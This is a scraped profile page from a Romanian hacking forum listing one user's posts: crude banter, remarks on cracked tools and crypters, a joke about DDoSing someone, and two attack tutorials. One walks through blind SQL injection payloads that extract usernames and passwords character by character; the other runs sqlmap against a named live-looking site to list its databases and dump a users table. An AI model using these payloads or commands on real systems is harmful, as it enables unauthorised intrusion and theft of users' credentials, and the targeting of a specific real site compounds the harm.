.Slacker
Active Members-
Posts
294 -
Joined
-
Last visited
Everything posted by .Slacker
-
Havji 1.15 Pro [Final Crack Fixed] + License
.Slacker replied to albertynos's topic in Programe hacking
Eu il folosesc sa sparg hashurile -
Automatic Login System in VB.NET and source code
.Slacker replied to bc-vnt's topic in Programe hacking
Bravo ma bine ca ai editat Nu e vorba de asta omule de download sau ceva..E vorba ca nu e hack. E fix pielea pulii -
Automatic Login System in VB.NET and source code
.Slacker replied to bc-vnt's topic in Programe hacking
Si ce cauta asta la programe hack? -
Kaspersky 2013 full + keys/activators!
.Slacker replied to ganjalover's topic in Programe securitate
Bine ca le "place":)))))) -
OFF: Devine enervant ON: Bun venit, redu numarul emoticoanelor.
-
Programele sunt bune pentru ca le-am testat in trecut. Acum, nu stiu cat de bune sunt, dar cand voi avea timp voi face un test
-
Ai lasat fereastra deschisa la hotelul din costinesti?))
-
Track si DDoS Apoi ii trimiti o cruce pe adresa
-
caut pe cineva care poate sa hackuiasca un sait
.Slacker replied to caut_hacker's topic in RST Market
Ai grija ca fac atac la persoana:)) Si daca tu ai fost retard si ti-ai luat teapa, vrei sa dai alta la randul tau? -
SQLi Inject pentru site-uri vulnerabile
-
caut pe cineva care poate sa hackuiasca un sait
.Slacker replied to caut_hacker's topic in RST Market
-
3:23 - Ce cratima are ma-ta
-
In costinesti gasim: -Cocalari: -Lautari: -Scandaluri: etc:))
-
Le aruncam grenade pe geam
-
Ai stat tu asa si ce ai zis? Ma..cu jocurile nu mai merge..mai bine ma fac hacker:)) ON: Bun venit, sedere placuta
-
2 cryptere,Indetectables Crypter, si Mitsubishi Eclipse GT Protector
.Slacker replied to io.kent's topic in Programe hacking
Nu vezi ca e banned? Poate cand revine -
Blind SQLi Injection .Slacker 30 August 2012 Sa luam ca exemplu: http://www.site.com/news.php?id=5 http://www.site.com/news.php?id=5 and 1=1 <= unde 1=1 este adevarat http://www.site.com/news.php?id=5 and 1=2 <= unde 1=2 este fals 1. MySQL Pentru blind vom folosii substring. http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 Inlocuim 4 cu 5 daca query-ul este adevarat. http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5 2. Subselect Cand nu functioneaza vom folosii subselect. http://www.site.com/news.php?id=5 and (select 1)=1 Acum vom vedea daca avem acces la mysql.user http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1 Daca pagina se incarca in mod normal, avem acces la mysql.user 3. Verificarea numelui tabelelor si coloanelor http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (cu limit 0,1 query-ul rezulta un rand de date din cauza subselect-ului. Daca pagina se incarca in mod normal, fara continut lipsa, exista. Daca avem FALSE lipsete un articol schimbam doar numele tabelului pana cand il ghicim. Sa zicem ca numele tabelului cu utilizatori este users. Acum avem nevoie de numele coloanei. http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 Daca pagina se incarca in mod normal, inseamna ca numele coloanei este Password. Avem o coloana cu parola. 4. Extragerea datelor din baza de date Daca am gasit tabelul cu utilizatori si coloana, parola si numele de utilizator, vom extragere caracterele din lista. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 Convertim caracterul 1 in valoare ASCII ( ASCII() ) Vom incerca sa ajungem la FALSE. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95 Am ajuns la TRUE si trebuie sa pastram incrementarea. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 Avem TRUE din nou. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 Acum avem FALSE. Primul caracter din USERNAME este char(99) Convertim in ASCII: char(99) este scris 'c'. Sa verificam al doilea caracter: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Am schimbat ,1,1 in ,2,1 pentru a obtine al doilea caracter. Acum ne intorcem la caracterul 1: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 Pagina ar trebuii sa se incarce in mod normal deci este TRUE. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107 Este fals si reducem numarul: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104 Este adevarat si ridicam numarul: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105 Fals. Deci al doilea caracter este char(105) si este 'i', si avem 'ci' in masura atunci ca incrementam pana la sfarsit atunci cand >0 returneaza fals (FALSE) stim ca ajungem la final. Sper ca am ajutat cu acest tutorial
-
The vulnerable link I’m going to use is (more vulneable link's at the end) "http://www.waterufo.net/item.php?id=200" 1. Open BackTrack5 and Open a new Konsole Type the file path of sqlmap: cd /pentest/web/scanners/sqlmap Next step is.. /sqlmap.py -u http://www.waterufo.net/item.php?id=200 --level 5 --risk 3 --dbs (If we want to scan the full website, the syntax will be ./sqlmap.py -u Welcome to Water UFO Research Site --level 5 --risk 3 --dbs) We got information that the parameter is injectable Type 'N' (I’m stopping the scan because i got one injectable parameter, if u want u can continue the scan) We got the database names The next step is to find the tables and columns on the database, I’m taking the database “waterufo_net” /sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net We got all the tables in the database: Next we have to find the columns in the table fl_users /sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net it will display the columns on the database: to retrieve the column values type --dump at the end of the previous query: /sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dump Sursa: hakforums.net
-
Da. Bagi 004076..
-
Merge Test: Slacker - GO SLIDE SMS